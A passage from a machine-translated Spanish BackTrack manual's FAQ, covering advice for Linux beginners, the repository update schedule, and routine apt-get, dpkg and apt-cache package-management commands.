Importante: root (raíz * * @ *) está prohibida por defecto en este canal, así que por favor asegúrese de configurar su cliente de irc adecuadamente.

Soy nuevo en linux, es BackTrack un buen lugar para empezar? Lo sentimos, la respuesta simple a esto es no.

BackTrack es una distribución altamente especializado, donde muchas de las tareas normales no se hace automáticamente para usted, ya que están en una distribución de corriente.

Nuestro mejor consejo, si usted desea comenzar usando linux con BackTrack como su primer sistema operativo Linux, es no.

Comience por descargar una copia de Kubuntu (ya que es un sistema de base de operaciones similares a BackTrack) de arranque en esa y te obligas a hacer todo lo que está acostumbrado a hacer sobre una base diaria con que, preferiblemente pasar la mayor parte de su tiempo usando el comando herramientas de línea. ¿Cuándo y sólo cuando se pueden realizar todas las tareas diarias sin tener que buscar de seguridad de los ficheros debe mover a BackTrack.

Por favor no tome esto como nosotros diciendo que no debería utilizar la Ruta inversa, tómelo como un consejo amistoso que te estás metiendo todo un mundo de dolor y frustración si no está completamente cómodo realizando la administración de su propia máquina linux antes comenzar con Backtrack.

Acabo de descargar e instalar la última versión de Backtrack, ¿aún necesito actualizar? A pesar de que ha descargado la última versión de la ISO o VM, esto no significa que usted tendrá los últimos paquetes que ofrecemos. BackTrack es desarrollado y actualizado de manera continua, y por esta razón usted debe actualizar su instalación de forma regular para mantenerse al día con los últimos paquetes, correcciones de errores y nuevas herramientas.

¿Cuándo y con qué frecuencia se actualiza el repositorio BackTrack con nuevos paquetes? En general, el repo BackTrack se actualiza con los nuevos paquetes de fines de semana en un domingo por la noche para que estén disponibles para usted en la mañana del lunes.

Hay veces, sin embargo cuando nos parece que un paquete tiene que ser puesto en libertad de inmediato en lugar de esperar hasta el próximo Domingo programado repo actualización. Así que en estos casos la

Page 108: Manual Backtrack

actualización del repositorio puede ocurrir en cualquier momento del día o de la noche durante la semana.

Tenga en cuenta que si bien el repo se está sincronizado, no estará disponible para su descarga los paquetes. Este proceso no toma mucho tiempo, así que será raro que esto cause alguno de vosotros tiene más de un período muy corto de indisponibilidad.

¿Cómo puedo actualizar Backtrack con los nuevos paquetes? Primero asegúrese de que usted tiene una conexión a internet, a continuación, utilice los siguientes comandos

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get upgrade

Opcionalmente se puede ejecutar

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get dist-upgrade

¿Dónde puedo encontrar una lista completa de todas las herramientas instaladas en BackTrack? No existe tal recurso, sin embargo usted puede ver una lista de todos los paquetes instalados en el sistema BackTrack ejecutando:

dpkg - list

Por favor recuerde que esto mostrará todos los paquetes instalados en BackTrack y no sólo las herramientas

También puede buscar en el repositorio para un paquete particular de interés, ejecute el comando siguiente:

apt-cache search <keyword de interest>